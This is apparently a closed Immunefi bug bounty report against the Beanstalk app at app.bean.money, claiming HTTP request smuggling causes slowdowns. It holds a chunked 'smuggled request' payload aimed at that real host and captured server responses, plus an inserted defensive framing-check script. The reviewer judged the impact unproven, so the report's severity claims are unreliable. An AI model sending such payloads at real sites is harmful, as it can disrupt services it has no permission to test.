Beanstalk Notion

Report #32082

Report Date
June 7, 2024
Status
Closed
Payout

HTTP Request Smuggling Leads to Taking Down the application/website

Report Info

Report ID

#32082

Report type

Websites and Applications

Has PoC?

Yes

PoC Link

https://gist.github.com/imhego/36857861fe7bed0b67683c6f667babc6

Target

https://app.bean.money

Impacts

Taking down the application/website requiring manual restoration

Description

HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.

Vulnerability Details

Offer a detailed explanation of the vulnerability itself. Do not leave out any relevant information. Code snippets should be supplied whenever helpful, as long as they don’t overcrowd the report with unnecessary details. This section should make it obvious that you understand exactly what you’re talking about, and more importantly, it should be clear by this point that the vulnerability does exist.

Smuggled Request Sample

POST / HTTP/1.1
Host: app.bean.money
Accept: */*
Connection: keep-alive
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Host: app.bean.money


POST / HTTP/1.1
Host: app.bean.money


POST / HTTP/1.1
Host: app.bean.money


POST / HTTP/1.1
Host: app.bean.money
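Added here as an illustration, not part of the report or of Immunefi's review: a strict HTTP/1.1 request-framing check of the kind a front-end proxy or WAF can apply so that a message with ambiguous framing is rejected rather than forwarded for a back end to interpret its own way. Run over the sample above it yields five separately framed requests (under strict parsing the sample is plain pipelining); a constructed message carrying both Content-Length and Transfer-Encoding is refused. Function and variable names are the example's own.

```python
# Added example, not code from the report or from Immunefi: a strict HTTP/1.1 framing
# check a front-end proxy can apply so ambiguous messages are rejected, not forwarded.
def next_message(buf):
    """Return (bytes consumed, error or None) for the first request in buf."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return 0, "incomplete"
    hdrs = [(n.strip().lower(), v.strip()) for n, _, v in
            (line.partition(b":") for line in buf[:end].split(b"\r\n")[1:])]
    cls = [v for n, v in hdrs if n == b"content-length"]
    tes = [v for n, v in hdrs if n == b"transfer-encoding"]
    pos = end + 4
    # RFC 9112 s.6.3: CL+TE, conflicting CLs, or a TE that is not a lone "chunked"
    # is ambiguous framing; reject it rather than guess which header wins.
    if ((cls and tes) or len(set(cls)) > 1 or any(not c.isdigit() for c in cls)
            or (tes and tes[0].lower() != b"chunked")):
        return 0, "ambiguous_framing"
    if cls:
        pos += int(cls[0])
        return (pos, None) if pos <= len(buf) else (0, "incomplete")
    if not tes:
        return pos, None  # no framing header: the request carries no body
    while True:  # chunked: walk the body to its terminating zero-size chunk
        nl = buf.find(b"\r\n", pos)
        field = buf[pos:nl].split(b";")[0].strip() if nl >= 0 else b""
        if not field or any(c not in b"0123456789abcdefABCDEF" for c in field):
            return 0, "bad_chunk"
        data_end = nl + 2 + int(field, 16)
        if buf[data_end:data_end + 2] != b"\r\n":
            return 0, "bad_chunk"  # chunk data must end in CRLF (or buffer is short)
        pos = data_end + 2
        if data_end == nl + 2:  # zero-size chunk: the body (and message) ends here
            return pos, None

def split_requests(buf):
    """Split a connection buffer into [(request_line, error)]. A front end
    should close the connection at the first error instead of forwarding."""
    out, err = [], None
    while buf and not err:
        n, err = next_message(buf)
        out.append((buf.split(b"\r\n", 1)[0], err))
        buf = buf[n:]
    return out

# Constructed inputs: SAMPLE mirrors the report's sample; CL_TE carries both framing headers.
SAMPLE = (b"POST / HTTP/1.1\r\nHost: app.bean.money\r\nAccept: */*\r\n"
          b"Connection: keep-alive\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"
          + b"POST / HTTP/1.1\r\nHost: app.bean.money\r\n\r\n" * 4)
CL_TE = (b"POST / HTTP/1.1\r\nHost: app.bean.money\r\nContent-Length: 4\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")
```

Whether the sample above does any harm depends on the two hops disagreeing on where the first message ends; a front end that frames this strictly and closes on any ambiguity removes that disagreement.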

Impact Details

Normally, the processing time for each user's request is approximately 120 milliseconds. However, after injecting the smuggled requests, the server is forced to respond to all the requests as a single request. This significantly increases the load on the server, causing the processing time to spike to 3000 milliseconds. (Additionally, it is possible to retest to apply more pressure on the web server and induce further delay.)

Proof of concept

HTTP/1.1 308 Permanent Redirect
Content-Type: text/plain; charset=utf-8
Date: Fri, 07 Jun 2024 16:55:08 GMT
Location: https://app.bean.money/
Server: Netlify
X-Nf-Request-Id: 01HZST07SV3097JB2P01BK44EY
Content-Length: 38

Redirecting to https://app.bean.money/

HTTP/1.1 308 Permanent Redirect
Content-Type: text/plain; charset=utf-8
Date: Fri, 07 Jun 2024 16:55:08 GMT
Location: https://app.bean.money/
Server: Netlify
X-Nf-Request-Id: 01HZST07SVK0SHJBWKZK5V96JV
Content-Length: 38

Redirecting to https://app.bean.money/

HTTP/1.1 308 Permanent Redirect
Content-Type: text/plain; charset=utf-8
Date: Fri, 07 Jun 2024 16:55:08 GMT
Location: https://app.bean.money/
Server: Netlify
X-Nf-Request-Id: 01HZST07SWF25MQ9TYRXSM0WDT
Content-Length: 38

Redirecting to https://app.bean.money/

HTTP/1.1 308 Permanent Redirect
Content-Type: text/plain; charset=utf-8
Date: Fri, 07 Jun 2024 16:55:08 GMT
Location: https://app.bean.money/
Server: Netlify
X-Nf-Request-Id: 01HZST07SW3DN91YW1ASM2XT23
Content-Length: 38

Redirecting to https://app.bean.money/

...

Immunefi Response

Unfortunately, after reviewing your report, Immunefi has decided to close it due to the assessed impact being out of scope.

Immunefi review:

  • The claimed impact by the whitehat is in scope of the bug bounty program, but the assessed impact doesn't match the claimed impact for the following reason:
    • The whitehat has not provided enough information on how HTTP Request Smuggling can cause the disruption of the entire application for regular users.
  • The assessed asset IS in scope for the bug bounty program.

Please note that the project will receive a report of the closed submission and may choose to re-open it, but they are not obligated to do so.